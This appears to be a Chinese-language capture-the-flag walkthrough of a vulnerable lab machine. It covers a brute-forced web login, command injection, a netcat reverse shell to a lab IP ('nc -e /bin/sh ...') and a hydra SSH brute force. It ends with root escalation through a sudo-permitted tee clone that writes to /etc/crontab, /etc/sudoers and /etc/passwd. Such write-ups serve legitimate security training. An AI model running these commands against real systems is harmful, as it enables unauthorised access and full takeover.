nmap 扫描端口
浏览器访问一下,一个登陆界面,admin 作为用户名 password 爆破一下
登上以后
命令执行!?
抓包改一下,发现可以执行其他命令
nc 反弹个shell
我第一时间想到的是 echo 写个 shell 进去,大佬的是直接用 nc
nc -e /bin/sh 192.168.149.141 6666
还是用 python 生成一个友好点的交互
在 jim 目录下面发现一个 backups 里面有 old-password
尝试爆破登录 ssh?哦吼,中奖
参数解释:
-l jim 指定爆破账号为 jim-w 10 指定每个线程的回应时间为 10S-P pwd.txt 指定密码字典为 pwd.txt-t 10 指定爆破线程为 10 个-v 指定显示爆破过程-f 查找到第一个可以使用的账号和密码的时候停止破解
ssh jim@192.168.149.160
密码:jibril04
在 /var/mail 目录下查看邮件信息
得到 charles 的密码:^xHhA&hvim0y,su 切换一下
sudo -l 看一下,发现 teehee 不需要密码就可以 root 权限运行
teehee 用来将标准输入复制到文件,也复制到标准输出
使用 teehee /etc/crontab 编辑一下,crontab 是计划任务,把时间全设置为 * 就会每分钟执行一次
输入:* * * * * root chmod 4777 /bin/sh
多出来的这一位权限位可以看一下这个:
https://www.cnblogs.com/zklidd/p/7100276.html
等一会,然后 /bin/sh 就可以了
另两种方法
1、
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
sudo su root,然后输入 charles 的密码
2、
如果能写在 passwd 里面一个 /bin/sh 的,跟 root 一样的话就可以
echo "yichen::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
然后直接 su yichen 就可以